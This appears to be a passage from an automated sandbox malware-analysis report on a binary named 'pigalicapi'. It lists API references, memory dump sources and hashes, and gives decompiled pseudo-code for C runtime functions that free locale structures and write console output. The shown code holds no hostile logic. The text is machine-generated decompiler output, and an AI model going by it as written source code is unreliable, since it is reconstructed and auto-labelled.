                                                                                                                                                                                                                                                                        • Part of subcall function 00FBBA92: _free.LIBCMT ref: 00FBBAF7
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBBA92: _free.LIBCMT ref: 00FBBB09
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBBA92: _free.LIBCMT ref: 00FBBB1B
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBBA92: _free.LIBCMT ref: 00FBBB2D
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBBA92: _free.LIBCMT ref: 00FBBB3F
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBBA92: _free.LIBCMT ref: 00FBBB51
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBBA92: _free.LIBCMT ref: 00FBBB63
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBBA92: _free.LIBCMT ref: 00FBBB75
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBBA92: _free.LIBCMT ref: 00FBBB87
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBAC65
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBA6DA: HeapFree.KERNEL32(00000000,00000000,?,00FBBC27,?,00000000,?,00000000,?,00FBBC4E,?,00000007,?,?,00FBADC4,?), ref: 00FBA6F0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBA6DA: GetLastError.KERNEL32(?,?,00FBBC27,?,00000000,?,00000000,?,00FBBC4E,?,00000007,?,?,00FBADC4,?,?), ref: 00FBA702
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBAC87
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBAC9C
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBACA7
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBACC9
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBACDC
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBACEA
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBACF5
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBAD2D
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBAD34
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBAD51
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBAD69
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                                                                                                                      • Opcode ID: 307b25978d0a4fb304940cfc1f97fd3dcaafbb86eae08d798622a49481761f52
                                                                                                                                                                                                                                                                      • Instruction ID: c74fff9d0b83899186b935314fa4861421fa92eb9cda29efb36ab2b611e522d2
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 307b25978d0a4fb304940cfc1f97fd3dcaafbb86eae08d798622a49481761f52
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D319EB1A047009FEB21AA3ADC05BDA77E9FF103A1F144829E499C6561DF35EC40BF12
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E00FB9B3C(char _a4) {
                                                                                                                                                                                                                                                                      				char _v8;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t26 = _a4;
                                                                                                                                                                                                                                                                      				_t52 =  *_a4;
                                                                                                                                                                                                                                                                      				if( *_a4 != 0x1007298) {
                                                                                                                                                                                                                                                                      					E00FBA6DA(_t52);
                                                                                                                                                                                                                                                                      					_t26 = _a4;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				E00FBA6DA( *((intOrPtr*)(_t26 + 0x3c)));
                                                                                                                                                                                                                                                                      				E00FBA6DA( *((intOrPtr*)(_a4 + 0x30)));
                                                                                                                                                                                                                                                                      				E00FBA6DA( *((intOrPtr*)(_a4 + 0x34)));
                                                                                                                                                                                                                                                                      				E00FBA6DA( *((intOrPtr*)(_a4 + 0x38)));
                                                                                                                                                                                                                                                                      				E00FBA6DA( *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                                                                                                                                                      				E00FBA6DA( *((intOrPtr*)(_a4 + 0x2c)));
                                                                                                                                                                                                                                                                      				E00FBA6DA( *((intOrPtr*)(_a4 + 0x40)));
                                                                                                                                                                                                                                                                      				E00FBA6DA( *((intOrPtr*)(_a4 + 0x44)));
                                                                                                                                                                                                                                                                      				E00FBA6DA( *((intOrPtr*)(_a4 + 0x360)));
                                                                                                                                                                                                                                                                      				_v8 =  &_a4;
                                                                                                                                                                                                                                                                      				E00FB9A02(5,  &_v8);
                                                                                                                                                                                                                                                                      				_v8 =  &_a4;
                                                                                                                                                                                                                                                                      				return E00FB9A52(4,  &_v8);
                                                                                                                                                                                                                                                                      			}




                                                                                                                                                                                                                                                                      0x00fb9b42
                                                                                                                                                                                                                                                                      0x00fb9b45
                                                                                                                                                                                                                                                                      0x00fb9b4d
                                                                                                                                                                                                                                                                      0x00fb9b50
                                                                                                                                                                                                                                                                      0x00fb9b55
                                                                                                                                                                                                                                                                      0x00fb9b58
                                                                                                                                                                                                                                                                      0x00fb9b5c
                                                                                                                                                                                                                                                                      0x00fb9b67
                                                                                                                                                                                                                                                                      0x00fb9b72
                                                                                                                                                                                                                                                                      0x00fb9b7d
                                                                                                                                                                                                                                                                      0x00fb9b88
                                                                                                                                                                                                                                                                      0x00fb9b93
                                                                                                                                                                                                                                                                      0x00fb9b9e
                                                                                                                                                                                                                                                                      0x00fb9ba9
                                                                                                                                                                                                                                                                      0x00fb9bb7
                                                                                                                                                                                                                                                                      0x00fb9bbf
                                                                                                                                                                                                                                                                      0x00fb9bc8
                                                                                                                                                                                                                                                                      0x00fb9bd0
                                                                                                                                                                                                                                                                      0x00fb9be4

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FB9B50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBA6DA: HeapFree.KERNEL32(00000000,00000000,?,00FBBC27,?,00000000,?,00000000,?,00FBBC4E,?,00000007,?,?,00FBADC4,?), ref: 00FBA6F0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBA6DA: GetLastError.KERNEL32(?,?,00FBBC27,?,00000000,?,00000000,?,00FBBC4E,?,00000007,?,?,00FBADC4,?,?), ref: 00FBA702
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FB9B5C
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FB9B67
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FB9B72
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FB9B7D
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FB9B88
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FB9B93
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FB9B9E
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FB9BA9
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FB9BB7
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                      • Opcode ID: eeaba63ccbc5cbb17d56fd6a963b3a9d27db7591705f471f31f42883ad2a1764
                                                                                                                                                                                                                                                                      • Instruction ID: bae6c1aa74fce421dde500fbc6e745a0afa20266be5a907076ec78708307edd6
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eeaba63ccbc5cbb17d56fd6a963b3a9d27db7591705f471f31f42883ad2a1764
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 111177B6604108BFCB01EF56CC52CD93BA6EF14390B5581A5FA588F132D635EA51BF81
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 62%
                                                                                                                                                                                                                                                                      			E00FC3221(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				signed char _v15;
                                                                                                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                                                                                                      				void _v24;
                                                                                                                                                                                                                                                                      				short _v28;
                                                                                                                                                                                                                                                                      				char _v31;
                                                                                                                                                                                                                                                                      				void _v32;
                                                                                                                                                                                                                                                                      				long _v36;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				void* _v44;
                                                                                                                                                                                                                                                                      				signed int _v48;
                                                                                                                                                                                                                                                                      				signed char* _v52;
                                                                                                                                                                                                                                                                      				long _v56;
                                                                                                                                                                                                                                                                      				int _v60;
                                                                                                                                                                                                                                                                      				signed int _t78;
                                                                                                                                                                                                                                                                      				signed int _t80;
                                                                                                                                                                                                                                                                      				int _t86;
                                                                                                                                                                                                                                                                      				void* _t94;
                                                                                                                                                                                                                                                                      				long _t97;
                                                                                                                                                                                                                                                                      				void _t105;
                                                                                                                                                                                                                                                                      				void* _t112;
                                                                                                                                                                                                                                                                      				signed int _t116;
                                                                                                                                                                                                                                                                      				signed int _t118;
                                                                                                                                                                                                                                                                      				signed char _t123;
                                                                                                                                                                                                                                                                      				signed char _t128;
                                                                                                                                                                                                                                                                      				intOrPtr _t129;
                                                                                                                                                                                                                                                                      				signed int _t131;
                                                                                                                                                                                                                                                                      				signed char* _t133;
                                                                                                                                                                                                                                                                      				intOrPtr* _t135;
                                                                                                                                                                                                                                                                      				signed int _t136;
                                                                                                                                                                                                                                                                      				void* _t137;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t78 =  *0x104dd74; // 0xfe5fa47e
                                                                                                                                                                                                                                                                      				_v8 = _t78 ^ _t136;
                                                                                                                                                                                                                                                                      				_t80 = _a8;
                                                                                                                                                                                                                                                                      				_t118 = _t80 >> 6;
                                                                                                                                                                                                                                                                      				_t116 = (_t80 & 0x0000003f) * 0x30;
                                                                                                                                                                                                                                                                      				_t133 = _a12;
                                                                                                                                                                                                                                                                      				_v52 = _t133;
                                                                                                                                                                                                                                                                      				_v48 = _t118;
                                                                                                                                                                                                                                                                      				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x104e830 + _t118 * 4)) + _t116 + 0x18));
                                                                                                                                                                                                                                                                      				_v40 = _a16 + _t133;
                                                                                                                                                                                                                                                                      				_t86 = GetConsoleCP();
                                                                                                                                                                                                                                                                      				_t135 = _a4;
                                                                                                                                                                                                                                                                      				_v60 = _t86;
                                                                                                                                                                                                                                                                      				 *_t135 = 0;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t135 + 4)) = 0;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t135 + 8)) = 0;
                                                                                                                                                                                                                                                                      				while(_t133 < _v40) {
                                                                                                                                                                                                                                                                      					_v28 = 0;
                                                                                                                                                                                                                                                                      					_v31 =  *_t133;
                                                                                                                                                                                                                                                                      					_t129 =  *((intOrPtr*)(0x104e830 + _v48 * 4));
                                                                                                                                                                                                                                                                      					_t123 =  *(_t129 + _t116 + 0x2d);
                                                                                                                                                                                                                                                                      					if((_t123 & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                      						if(( *(E00FB9839(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                                                                                                                                                                                                                                      							_push(1);
                                                                                                                                                                                                                                                                      							_push(_t133);
                                                                                                                                                                                                                                                                      							goto L8;
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							if(_t133 >= _v40) {
                                                                                                                                                                                                                                                                      								_t131 = _v48;
                                                                                                                                                                                                                                                                      								 *((char*)( *((intOrPtr*)(0x104e830 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                                                                                                                                                                                                                                                      								 *( *((intOrPtr*)(0x104e830 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x104e830 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_t112 = E00FC27F0( &_v28, _t133, 2);
                                                                                                                                                                                                                                                                      								_t137 = _t137 + 0xc;
                                                                                                                                                                                                                                                                      								if(_t112 != 0xffffffff) {
                                                                                                                                                                                                                                                                      									_t133 =  &(_t133[1]);
                                                                                                                                                                                                                                                                      									goto L9;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t128 = _t123 & 0x000000fb;
                                                                                                                                                                                                                                                                      						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                                                                                                                                                                                                                                                      						_push(2);
                                                                                                                                                                                                                                                                      						_v15 = _t128;
                                                                                                                                                                                                                                                                      						 *(_t129 + _t116 + 0x2d) = _t128;
                                                                                                                                                                                                                                                                      						_push( &_v16);
                                                                                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                                                                                      						_push( &_v28);
                                                                                                                                                                                                                                                                      						_t94 = E00FC27F0();
                                                                                                                                                                                                                                                                      						_t137 = _t137 + 0xc;
                                                                                                                                                                                                                                                                      						if(_t94 != 0xffffffff) {
                                                                                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                                                                                      							_t133 =  &(_t133[1]);
                                                                                                                                                                                                                                                                      							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                                                                                                                                                                                                                                      							_v56 = _t97;
                                                                                                                                                                                                                                                                      							if(_t97 != 0) {
                                                                                                                                                                                                                                                                      								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                                                                                                                                                                                                                                      									L19:
                                                                                                                                                                                                                                                                      									 *_t135 = GetLastError();
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                                                                                                                                                                                                                                                                      									if(_v36 >= _v56) {
                                                                                                                                                                                                                                                                      										if(_v31 != 0xa) {
                                                                                                                                                                                                                                                                      											goto L16;
                                                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                                                      											_t105 = 0xd;
                                                                                                                                                                                                                                                                      											_v32 = _t105;
                                                                                                                                                                                                                                                                      											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                                                                                                                                                                                                                                      												goto L19;
                                                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                                                      												if(_v36 >= 1) {
                                                                                                                                                                                                                                                                      													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                                                                                                                                                                                                                                                                      													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                                                                                                                                                                                                      													goto L16;
                                                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                                                                                      					L16:
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				L20:
                                                                                                                                                                                                                                                                      				return E00FBDC5F(_v8 ^ _t136);
                                                                                                                                                                                                                                                                      			}


































                                                                                                                                                                                                                                                                      0x00fc3229
                                                                                                                                                                                                                                                                      0x00fc3230
                                                                                                                                                                                                                                                                      0x00fc3233
                                                                                                                                                                                                                                                                      0x00fc323b
                                                                                                                                                                                                                                                                      0x00fc323f
                                                                                                                                                                                                                                                                      0x00fc324b
                                                                                                                                                                                                                                                                      0x00fc324e
                                                                                                                                                                                                                                                                      0x00fc3251
                                                                                                                                                                                                                                                                      0x00fc3258
                                                                                                                                                                                                                                                                      0x00fc3260
                                                                                                                                                                                                                                                                      0x00fc3263
                                                                                                                                                                                                                                                                      0x00fc3269
                                                                                                                                                                                                                                                                      0x00fc326f
                                                                                                                                                                                                                                                                      0x00fc3274
                                                                                                                                                                                                                                                                      0x00fc3276
                                                                                                                                                                                                                                                                      0x00fc3279
                                                                                                                                                                                                                                                                      0x00fc327e
                                                                                                                                                                                                                                                                      0x00fc3288
                                                                                                                                                                                                                                                                      0x00fc328f
                                                                                                                                                                                                                                                                      0x00fc3292
                                                                                                                                                                                                                                                                      0x00fc3299
                                                                                                                                                                                                                                                                      0x00fc32a0
                                                                                                                                                                                                                                                                      0x00fc32cc
                                                                                                                                                                                                                                                                      0x00fc32f2
                                                                                                                                                                                                                                                                      0x00fc32f4
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fc32ce
                                                                                                                                                                                                                                                                      0x00fc32d1
                                                                                                                                                                                                                                                                      0x00fc3398
                                                                                                                                                                                                                                                                      0x00fc33a4
                                                                                                                                                                                                                                                                      0x00fc33af
                                                                                                                                                                                                                                                                      0x00fc33b4
                                                                                                                                                                                                                                                                      0x00fc32d7
                                                                                                                                                                                                                                                                      0x00fc32de
                                                                                                                                                                                                                                                                      0x00fc32e3
                                                                                                                                                                                                                                                                      0x00fc32e9
                                                                                                                                                                                                                                                                      0x00fc32ef
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fc32ef
                                                                                                                                                                                                                                                                      0x00fc32e9
                                                                                                                                                                                                                                                                      0x00fc32d1
                                                                                                                                                                                                                                                                      0x00fc32a2
                                                                                                                                                                                                                                                                      0x00fc32a6
                                                                                                                                                                                                                                                                      0x00fc32a9
                                                                                                                                                                                                                                                                      0x00fc32af
                                                                                                                                                                                                                                                                      0x00fc32b1
                                                                                                                                                                                                                                                                      0x00fc32b4
                                                                                                                                                                                                                                                                      0x00fc32b8
                                                                                                                                                                                                                                                                      0x00fc32f5
                                                                                                                                                                                                                                                                      0x00fc32f8
                                                                                                                                                                                                                                                                      0x00fc32f9
                                                                                                                                                                                                                                                                      0x00fc32fe
                                                                                                                                                                                                                                                                      0x00fc3304
                                                                                                                                                                                                                                                                      0x00fc330a
                                                                                                                                                                                                                                                                      0x00fc3319
                                                                                                                                                                                                                                                                      0x00fc331f
                                                                                                                                                                                                                                                                      0x00fc3325
                                                                                                                                                                                                                                                                      0x00fc332a
                                                                                                                                                                                                                                                                      0x00fc3346
                                                                                                                                                                                                                                                                      0x00fc33b9
                                                                                                                                                                                                                                                                      0x00fc33bf
                                                                                                                                                                                                                                                                      0x00fc3348
                                                                                                                                                                                                                                                                      0x00fc3350
                                                                                                                                                                                                                                                                      0x00fc3359
                                                                                                                                                                                                                                                                      0x00fc335f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fc3361
                                                                                                                                                                                                                                                                      0x00fc3363
                                                                                                                                                                                                                                                                      0x00fc3366
                                                                                                                                                                                                                                                                      0x00fc337f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fc3381
                                                                                                                                                                                                                                                                      0x00fc3385
                                                                                                                                                                                                                                                                      0x00fc3387
                                                                                                                                                                                                                                                                      0x00fc338a
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fc338a
                                                                                                                                                                                                                                                                      0x00fc3385
                                                                                                                                                                                                                                                                      0x00fc337f
                                                                                                                                                                                                                                                                      0x00fc335f
                                                                                                                                                                                                                                                                      0x00fc3359
                                                                                                                                                                                                                                                                      0x00fc3346
                                                                                                                                                                                                                                                                      0x00fc332a
                                                                                                                                                                                                                                                                      0x00fc3304
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fc338d
                                                                                                                                                                                                                                                                      0x00fc338d
                                                                                                                                                                                                                                                                      0x00fc33c1
                                                                                                                                                                                                                                                                      0x00fc33d3

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00FC3996,?,00000000,?,00000000,00000000), ref: 00FC3263
                                                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 00FC32DE
                                                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 00FC32F9
                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00FC331F
                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,00FC3996,00000000,?,?,?,?,?,?,?,?,?,00FC3996,?), ref: 00FC333E
                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,00FC3996,00000000,?,?,?,?,?,?,?,?,?,00FC3996,?), ref: 00FC3377
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                      • Opcode ID: 81d38c28a5c1d2be2c1da0c23b7fbfb9d217bff08c23241a8103deb8030a8acd
                                                                                                                                                                                                                                                                      • Instruction ID: a6bed0871876193025a9ed8e9297f42df64294481428dc8c039333cfd4b1105f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81d38c28a5c1d2be2c1da0c23b7fbfb9d217bff08c23241a8103deb8030a8acd
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2751B2B1D0024A9FDB10CFA8D986FEEBBB8EF09310F14811EE955E7241D6709A41DBA1
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E00FBBC35(intOrPtr _a4) {
                                                                                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t45 = _a4;
                                                                                                                                                                                                                                                                      				if(_a4 != 0) {
                                                                                                                                                                                                                                                                      					E00FBBBF9(_t45, 7);
                                                                                                                                                                                                                                                                      					E00FBBBF9(_t45 + 0x1c, 7);
                                                                                                                                                                                                                                                                      					E00FBBBF9(_t45 + 0x38, 0xc);
                                                                                                                                                                                                                                                                      					E00FBBBF9(_t45 + 0x68, 0xc);
                                                                                                                                                                                                                                                                      					E00FBBBF9(_t45 + 0x98, 2);
                                                                                                                                                                                                                                                                      					E00FBA6DA( *((intOrPtr*)(_t45 + 0xa0)));
                                                                                                                                                                                                                                                                      					E00FBA6DA( *((intOrPtr*)(_t45 + 0xa4)));
                                                                                                                                                                                                                                                                      					E00FBA6DA( *((intOrPtr*)(_t45 + 0xa8)));
                                                                                                                                                                                                                                                                      					E00FBBBF9(_t45 + 0xb4, 7);
                                                                                                                                                                                                                                                                      					E00FBBBF9(_t45 + 0xd0, 7);
                                                                                                                                                                                                                                                                      					E00FBBBF9(_t45 + 0xec, 0xc);
                                                                                                                                                                                                                                                                      					E00FBBBF9(_t45 + 0x11c, 0xc);
                                                                                                                                                                                                                                                                      					E00FBBBF9(_t45 + 0x14c, 2);
                                                                                                                                                                                                                                                                      					E00FBA6DA( *((intOrPtr*)(_t45 + 0x154)));
                                                                                                                                                                                                                                                                      					E00FBA6DA( *((intOrPtr*)(_t45 + 0x158)));
                                                                                                                                                                                                                                                                      					E00FBA6DA( *((intOrPtr*)(_t45 + 0x15c)));
                                                                                                                                                                                                                                                                      					return E00FBA6DA( *((intOrPtr*)(_t45 + 0x160)));
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _t18;
                                                                                                                                                                                                                                                                      			}




                                                                                                                                                                                                                                                                      0x00fbbc3b
                                                                                                                                                                                                                                                                      0x00fbbc40
                                                                                                                                                                                                                                                                      0x00fbbc49
                                                                                                                                                                                                                                                                      0x00fbbc54
                                                                                                                                                                                                                                                                      0x00fbbc5f
                                                                                                                                                                                                                                                                      0x00fbbc6a
                                                                                                                                                                                                                                                                      0x00fbbc78
                                                                                                                                                                                                                                                                      0x00fbbc83
                                                                                                                                                                                                                                                                      0x00fbbc8e
                                                                                                                                                                                                                                                                      0x00fbbc99
                                                                                                                                                                                                                                                                      0x00fbbca7
                                                                                                                                                                                                                                                                      0x00fbbcb5
                                                                                                                                                                                                                                                                      0x00fbbcc6
                                                                                                                                                                                                                                                                      0x00fbbcd4
                                                                                                                                                                                                                                                                      0x00fbbce2
                                                                                                                                                                                                                                                                      0x00fbbced
                                                                                                                                                                                                                                                                      0x00fbbcf8
                                                                                                                                                                                                                                                                      0x00fbbd03
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbbd13
                                                                                                                                                                                                                                                                      0x00fbbd18

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBBBF9: _free.LIBCMT ref: 00FBBC22
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBBC83
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBA6DA: HeapFree.KERNEL32(00000000,00000000,?,00FBBC27,?,00000000,?,00000000,?,00FBBC4E,?,00000007,?,?,00FBADC4,?), ref: 00FBA6F0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBA6DA: GetLastError.KERNEL32(?,?,00FBBC27,?,00000000,?,00000000,?,00FBBC4E,?,00000007,?,?,00FBADC4,?,?), ref: 00FBA702
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBBC8E
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBBC99
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBBCED
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBBCF8
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBBD03
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBBD0E
